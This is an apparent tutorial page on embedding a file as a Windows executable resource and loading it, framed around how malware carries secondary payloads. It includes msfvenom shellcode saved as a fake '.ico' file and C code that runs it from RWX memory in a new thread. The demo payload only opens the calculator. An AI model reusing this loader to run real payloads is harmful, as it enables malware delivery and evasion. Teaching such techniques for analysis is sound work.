Load Resources

Code and executables download: From GitHub

What is a resource

Often, malicious and non-malicious software use other embedded files for different reasons. For example, ransomware might use an embedded image (called “Resource” by Microsoft) as a desktop image to inform the victim that their client has been infected. The same concept can be applied to any file type: ransom notes as txt files, PowerShell scripts, other .exe or .dll files, and so on.

The reasons why a malware author might want to embed a resource in the executable can vary. For example, embedding a resource can avoid unnecessary web calls to download an image, or provide a secondary payload (.exe with a different hash from the primary payload). Consider an executable that is on a system. When the user executes it, the sample deletes itself. This might seem odd; however, the sample might have extracted a secondary payload and moved it somewhere else. Searching for the hash of the first payload will no longer report any findings on the infected machine, since the first payload has removed itself and the second payload might go unnoticed.

Create and embed a resource

Embedding a resource in an executable is straightforward. The following components are needed:

1. A .exe to “take” the embedded file
2. A file to embed in the .exe
3. A .rc file to “describe” the resource. An example will be presented shortly; for more details on .rc files, see 1

For this demo, a file called calc.ico is used, which is the output of:

1
msfvenom --payload windows/exec CMD=calc.exe -f raw -o calc.ico`

The .rc file is a simple description of the resource file, where the version, the name of the product, and the language are defined:

1
#include <windows.h>
2

3
CALCICO RCDATA "calc.ico"
4

5
VS_VERSION_INFO VERSIONINFO
6
FILEVERSION 1,0,0,0
7
PRODUCTVERSION 1,0,0,0
8
BEGIN
9
    BLOCK "StringFileInfo"
10
    BEGIN
11
        BLOCK "040904B0"
12
        BEGIN
13
            VALUE "FileDescription", "Moise"
14
            VALUE "ProductName", "ProductMoise"
15
        END
16
    END
17
    BLOCK "VarFileInfo"
18
    BEGIN
19
        VALUE "Translation", 0x0409, 1200
20
    END
21
END

These two files and the first payload are then bundled together during compilation. The result is a single .exe, which contains the resource and the logic to extract it.

Before examining the code of the resource extraction logic, it is useful to open the resulting .exe file in pestudio and observe the resource in the “resources” section. From there, the resource can be saved locally by right-clicking on it → instance → dump to file.

Loading the resource

The resource management process is more involved than simply accessing the resource. The following steps are required:

• find the address of the resource and load it (FindResourceW 2 and LoadResource 3)
• get a pointer to the resource with LockResource 4
• get the size of the resource so that it can be allocated in memory or written to a file with SizeofResource 5

1
#include <windows.h>
2

3
#include <stdio.h>
4

5
#define RET_SUCCESS 0
6
#define RET_ERROR -1
7

8
int main() {
9
    HRSRC hRsrc = NULL;
10
    HGLOBAL hRes = NULL;
11
    HANDLE hFile = NULL;
12
    PVOID pData = NULL;
13
    SIZE_T resSize = 0;
14
    DWORD bytesWritten = 0;
15

16
    hRsrc = FindResourceW(NULL, L"CALCICO", MAKEINTRESOURCEW(10));
17
    if (hRsrc == NULL) {
18
        printf("Cannot locate resource, error: %lu \n", GetLastError());
19
        return RET_ERROR;
20
    }
21

22
    resSize = SizeofResource(NULL, hRsrc);
23
    if (resSize == 0) {
24
        printf("Cannot get the size of resource, error: %lu \n", GetLastError());
25
        return RET_ERROR;
26
    }
27

28
    hRes = LoadResource(NULL, hRsrc);
29
    if (hRes == NULL) {
30
        printf("Cannot load resource, error: %lu \n", GetLastError());
31
        return RET_ERROR;
32
    }
33

34
    pData = LockResource(hRes);
35
    hFile = CreateFileW(
36
        L"example.bin",
37
        GENERIC_WRITE,
38
        0,
39
        NULL,
40
        CREATE_ALWAYS,
41
        FILE_ATTRIBUTE_NORMAL,
42
        NULL
43
    );
44

45
    if (hFile == INVALID_HANDLE_VALUE) {
46
        printf("Cannot create file, error %lu\n", GetLastError());
47
        return RET_ERROR;
48
    }
49

50
    BOOL ok = WriteFile(hFile, pData, resSize, &bytesWritten, NULL);
51
    if (!ok) {
52
        printf("Cannot write file, error %lu\n", GetLastError());
53
        CloseHandle(hFile);
54
        return RET_ERROR;
55
    }
56

57
    CloseHandle(hFile);
58
    return RET_SUCCESS;
59
}

To compile the above code, the commands below are used. In both languages they have the same roles: the first builds a COFF file from the .rc specification 6 and the second bundles together the .exe that will be produced from the compilation and the calc.ico file.

1
i686-w64-mingw32-windres load_resource.rc -O coff -o load_resource.res
2
i686-w64-mingw32-gcc -o load_resource.exe -Os -s -ffunction-sections -fdata-sections -Wl,--gc-sections -fno-ident load_resource.c load_resource.res

Note that since the payload returned by msfvenom is 32-bit, the sample might crash, especially in the second example below, if compiled as a 64-bit application.

The function signatures for each of these calls are all pretty similar and rather straightforward. The first is FindResource:

1
HRSRC FindResourceA(
2
  [in, optional] HMODULE hModule,
3
  [in]           LPCSTR  lpName,
4
  [in]           LPCSTR  lpType
5
);

The purpose of this function is to determine the location of a resource with a specific name (lpName) and module (hModule). In the example, the hModule is always set to NULL since, per the documentation: “If this parameter is NULL, the function searches the module used to create the current process.” The second parameter is the name of the resource, which is populated with the value “CALCICO”. This value is defined in the .rc file:

1
CALCICO RCDATA "calc.ico"

which can be read as: “the resource with name CALCICO contains raw data (RCDATA) from the calc.ico file”. The name “CALCICO” is completely arbitrary. RCDATA is also the value of the lpType, which indicates the type of data contained in the resource. The list of possible values is defined in appendix 7, and in this case, since it is raw data, MAKEINTRESOURCE(10) is used.

Note that MAKEINTRESOURCE is a macro defined in the C winuser.h library, which converts an integer, like 10, to a resource type, and 10 means RT_RCDATA. In the Go code, this macro is not defined, so the RT_RCDATA value is used directly 8.

What is returned by FindResourceA is an HRSRC, which is a handle to a resource.

Next, SizeofResource is used:

1
DWORD SizeofResource(
2
  [in, optional] HMODULE hModule,
3
  [in]           HRSRC   hResInfo
4
);

Very simply, the hModule is still NULL for the same reason as above, and the hResInfo handle is the value returned by FindResourceA. The function returns a number.

LoadResource has the same signature as SizeofResource, and it is used to get a second handle, this time to the data themselves. Lastly, to obtain a pointer to the first byte of the resource data, LockResource is used; it takes a single argument, which is the value returned by LoadResource.

1
LPVOID LockResource(
2
  [in] HGLOBAL hResData
3
);

Note that LockResource does not actually lock the resource, but only returns the address of the first byte of data.

This address is then used in WriteFile. Since the function requires both an address to the data to write and the size of the data to write, all the needed information is already available to call the function and write the content to a file.

After execution, a new file called example.bin is created in the same directory as the .exe file.

A modified example

The code presented above can be changed to create a new process that executes the payload in the resources instead of writing it to a file.

1
#include <processthreadsapi.h>
2
#include <windows.h>
3

4
#include <stdio.h>
5
#include <winnt.h>
6

7
#define RET_SUCCESS 0
8
#define RET_ERROR -1
9

10
int main() {
11
    HRSRC hRsrc = NULL;
12
    HGLOBAL hRes = NULL;
13
    HANDLE hFile = NULL;
14
    PVOID pData = NULL;
15
    SIZE_T resSize = 0;
16
    DWORD bytesWritten = 0;
17

18
    hRsrc = FindResourceW(NULL, L"CALCICO", MAKEINTRESOURCEW(10));
19
    if (hRsrc == NULL) {
20
        printf("Cannot locate resource, error: %lu \n", GetLastError());
21
        return RET_ERROR;
22
    }
23

24
    resSize = SizeofResource(NULL, hRsrc);
25
    if (resSize == 0) {
26
        printf("Cannot get the size of resource, error: %lu \n", GetLastError());
27
        return RET_ERROR;
28
    }
29

30
    hRes = LoadResource(NULL, hRsrc);
31
    if (hRes == NULL) {
32
        printf("Cannot load resource, error: %lu \n", GetLastError());
33
        return RET_ERROR;
34
    }
35

36
    pData = LockResource(hRes);
37

38
    PVOID pVirtualAllocAddr =
39
        VirtualAlloc(NULL, resSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
40
    if (pVirtualAllocAddr == NULL) {
41
        printf("Cannot run virtualAlloc, error : %lu \n", GetLastError());
42
        return RET_ERROR;
43
    }
44

45
    memcpy(pVirtualAllocAddr, pData, resSize);
46
    memset(pData, '\0', resSize);
47

48
    HANDLE hCreateThread = CreateThread(NULL, 0, pVirtualAllocAddr, NULL, 0, NULL);
49

50
    if (hCreateThread == NULL) {
51
        printf("Cannot run CreateThread, error : %lu \n", GetLastError());
52
        return RET_ERROR;
53
    }
54
    WaitForSingleObject(hCreateThread, INFINITE);
55

56
    return RET_SUCCESS;
57
}

To compile the files, the commands are the same as above.

The code presented here is the same in terms of loading the resource; the only difference is what is done with it. It is not within the scope of this page to explain all the details of the functions used. However, at a high level, memory is allocated in the running process for the resource; the resource is then copied into that memory region and executed in a new thread.

Upon execution, the calculator spawns.

Appendix